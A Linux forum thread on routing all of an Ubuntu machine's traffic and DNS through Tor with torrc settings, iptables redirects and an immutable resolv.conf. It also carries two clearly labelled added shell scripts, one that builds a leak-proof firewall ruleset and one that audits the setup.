lock down a computer with tor

[chan] linux
Feb 11 14:33

I am not an expert with Linux. I am comfortable with the command line, but I am still having a hard time understanding iptables and Tor. How do I lock down my Ubuntu system so that all connections from all programs are forced through Tor on port 9150? This means also that the DNS queries go to Tor, stopping DNS leaks? Switching to another distro is not an option. What is important here is that I must find, analyze, and study every possible vector for any traffic leak to prevent it from ever happening at any time. This means in iptables, Tor, the gateway router, and anything else I have not learned about. What information do I need?

[chan] linux
Feb 11 14:53

I wish I could give any direct info, but have you checked whether the people from the Tails distro documented how they did it? Because they have a setup like this, I think.

[chan] linux
Feb 11 18:28

No worries, it's actually quite simple to set up. First you're going to need to edit the /etc/tor/torrc file and add a few changes:

    DNSPort 53520
    TransPort 9040

The DNSPort is for proxying DNS requests through Tor. The TransPort is for proxying TCP connections through Tor. Restart Tor. Now you'll have to change your iptables configuration and use something like:

    iptables -t nat -A OUTPUT -p udp -m udp --dport 53 -j REDIRECT --to-ports 53520
    iptables -t nat -A OUTPUT ! -o lo -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 9040

The first iptables command will redirect all DNS requests to go through Tor. The second command will make all TCP traffic go through Tor, but beware of this: I don't recommend using it for daily usage. Now edit /etc/resolv.conf and just put 'nameserver 127.0.0.1'. And voilà, no DNS leaks!
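The two nat rules above only cover UDP/53 and new TCP connections, and they also catch Tor's own sockets, so Tor's connections to its guards would be looped back into its own TransPort. The script below is an added example, not code from the thread or from the Tor project: it builds a complete iptables-restore ruleset that exempts Tor's process by uid, redirects DNS and TCP SYN as the post does, and gives the filter table a DROP policy so anything the redirects do not catch (other UDP, ICMP, raw sockets, all IPv6) is blocked instead of leaving directly. It assumes the post's torrc (TransPort 9040, DNSPort 53520) and that Tor runs as Ubuntu's default "debian-tor" user; both are assumptions, not facts from the thread.

```shell
#!/bin/sh
# Added example (not from the thread). Generates and loads a transparent-proxy
# ruleset for Tor. Assumptions: torrc has "TransPort 9040" and "DNSPort 53520"
# as in the post, and the tor daemon runs as user "debian-tor".

# tor_ruleset <tor_uid> [trans_port] [dns_port]: print an iptables-restore file.
tor_ruleset() {
    uid=$1; trans=${2:-9040}; dns=${3:-53520}
    cat <<EOF
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
# Tor's own sockets leave unredirected; everything below applies to other users.
-A OUTPUT -m owner --uid-owner $uid -j RETURN
# DNS first, before the loopback exemption, so queries aimed at 127.0.0.1:53
# (the resolv.conf setting from the thread) also land on Tor's DNSPort.
-A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports $dns
-A OUTPUT -p tcp --dport 53 -j REDIRECT --to-ports $dns
# Other local TCP (e.g. an app talking to Tor's SOCKS port) is not proxied.
-A OUTPUT -o lo -j RETURN
# New TCP connections (--syn equals --tcp-flags FIN,SYN,RST,ACK SYN) go to TransPort.
-A OUTPUT -p tcp --syn -j REDIRECT --to-ports $trans
COMMIT
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Redirected packets are re-routed to loopback, so the lo rule is what lets
# proxied traffic reach Tor; only Tor's uid may talk to a real interface.
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m owner --uid-owner $uid -j ACCEPT
COMMIT
EOF
}

# tor_ruleset6: the nat rules are IPv4 only and no IPv6 TransPort is
# configured, so drop all non-loopback IPv6 rather than let it bypass Tor.
tor_ruleset6() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
COMMIT
EOF
}

# apply_tor_ruleset: load both tables atomically; run as root after restarting tor.
apply_tor_ruleset() {
    uid=$(id -u debian-tor) || return 1
    tor_ruleset "$uid" | iptables-restore && tor_ruleset6 | ip6tables-restore
}

case ${1:-} in
    apply) apply_tor_ruleset ;;
    show)  tor_ruleset "$(id -u debian-tor)"; tor_ruleset6 ;;
esac
```

Run it as `sh tor-rules.sh show` to review the generated file and `sudo sh tor-rules.sh apply` to load it. iptables-restore replaces the whole table in one transaction, so there is no window where the old rules are gone and the new ones not yet present; that is why the example emits a restore file instead of a sequence of `iptables -A` commands.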

[chan] linux
Feb 11 19:16

This looks like solid advice. However, there are a couple of errata I haven't figured out. In /etc/resolv.conf I can't put 'nameserver 127.0.0.1' because this is what resolv.conf says:

    # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
    #     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
    nameserver 127.0.1.1
    search ARPA009

It seems there are several applications which I don't understand that programmatically make changes to resolv.conf. I suppose I need to find a way to lock this down too, and there may be other vectors I don't know.

[chan] linux
Feb 11 20:05

Yes, other programs are modifying /etc/resolv.conf. If you change it, it will get changed externally. What you can do is make the resolv.conf file immutable after changing its content. Put 'nameserver 127.0.0.1' in resolv.conf, and then run:

    chattr +i /etc/resolv.conf

That way the file can't be modified and stays as it is. If later on you want to change it again, run:

    chattr -i /etc/resolv.conf

and change the contents again.

[chan] linux
Feb 12 03:33

I used the iptables template from the torproject website and tweaked it a little, and it works. But I'm not sure that it blocks all DNS leaks. I need to be certain that all networking layers of my machine, from the kernel on down, have no query request beyond the gateway router. I'm scratching my head because there are so many fine points to investigate and I don't know where to start.
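A place to start is to write down each thing a leak depends on and check it mechanically. The audit below is an added example, not from the thread: it inspects the resolv.conf contents and immutable flag, the nat redirects, the filter OUTPUT policy and Tor's uid exemption, and the IPv6 policy, printing one line per finding. Each check takes its input as text, so it can be run against saved `iptables -S` output as well as the live system. It assumes the post's ports (DNSPort 53520, TransPort 9040) and Ubuntu's "debian-tor" user; the `audit_*` and `run_audit` names are this example's own.

```shell
#!/bin/sh
# Added example (not from the thread): leak audit for a transparent Tor setup.
# Assumptions: DNSPort 53520 and TransPort 9040 as in the post, tor running
# as user "debian-tor". Exit status 0 from run_audit means no finding.

# audit_resolv <contents of /etc/resolv.conf>: every nameserver must be
# 127.0.0.1 so the query hits the port-53 redirect to Tor's DNSPort. The
# 127.0.1.1 seen in the thread is a local stub (NetworkManager's dnsmasq on
# Ubuntu); its forwarded queries depend on the same redirect, so pinning
# 127.0.0.1 removes one moving part.
audit_resolv() {
    ns=$(printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | awk '$1 == "nameserver" { print $2 }')
    [ -n "$ns" ] || { echo "resolv.conf: no nameserver line"; return 1; }
    for n in $ns; do
        [ "$n" = "127.0.0.1" ] || { echo "resolv.conf: nameserver $n, expected 127.0.0.1"; return 1; }
    done
}

# audit_nat <output of "iptables -t nat -S OUTPUT"> [dns_port] [trans_port]
audit_nat() {
    dns=${2:-53520}; trans=${3:-9040}; rc=0
    printf '%s\n' "$1" | grep -q -- "-p udp .*--dport 53 -j REDIRECT --to-ports $dns" \
        || { echo "nat: UDP/53 is not redirected to DNSPort $dns"; rc=1; }
    printf '%s\n' "$1" | grep -q -- "-p tcp .*-j REDIRECT --to-ports $trans" \
        || { echo "nat: TCP is not redirected to TransPort $trans"; rc=1; }
    return $rc
}

# audit_filter <output of "iptables -S OUTPUT"> <tor_uid>: the redirects only
# catch UDP/53 and TCP SYN; a DROP policy with an exemption for Tor's own uid
# is what stops everything else (other UDP, ICMP) from leaving directly.
audit_filter() {
    rc=0
    printf '%s\n' "$1" | grep -q '^-P OUTPUT DROP$' \
        || { echo "filter: OUTPUT policy is not DROP, non-redirected traffic leaves directly"; rc=1; }
    printf '%s\n' "$1" | grep -q -- "--uid-owner $2 -j ACCEPT" \
        || { echo "filter: no ACCEPT for Tor's uid $2, Tor itself will be blocked"; rc=1; }
    return $rc
}

# audit_v6 <output of "ip6tables -S OUTPUT">: the nat redirects are IPv4 only.
audit_v6() {
    printf '%s\n' "$1" | grep -q '^-P OUTPUT DROP$' \
        || { echo "ip6tables: OUTPUT is not DROP, IPv6 traffic bypasses the IPv4 redirects"; return 1; }
}

# run_audit: gather the live inputs (needs root) and run every check.
run_audit() {
    uid=$(id -u debian-tor) || return 1
    rc=0
    audit_resolv "$(cat /etc/resolv.conf)" || rc=1
    # lsattr prints the attribute flags first; a lowercase "i" is immutable.
    case $(lsattr -d /etc/resolv.conf 2>/dev/null | cut -d' ' -f1) in
        *i*) ;;
        *) echo "resolv.conf: not immutable, resolvconf/NetworkManager can rewrite it (chattr +i)"; rc=1 ;;
    esac
    audit_nat "$(iptables -t nat -S OUTPUT)" || rc=1
    audit_filter "$(iptables -S OUTPUT)" "$uid" || rc=1
    audit_v6 "$(ip6tables -S OUTPUT)" || rc=1
    return $rc
}

if [ "${1:-}" = "run" ]; then run_audit; fi
```

Run `sudo sh tor-audit.sh run` after every change to the firewall or the resolver; a clean run is a necessary check, not a sufficient one, because it only covers the layers the thread has discussed. Raw sockets, the gateway router's own resolver, and anything that reads the network without going through netfilter still have to be looked at separately.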

[chan] linux
Feb 14 07:04

GUFW Ubuntu :-)
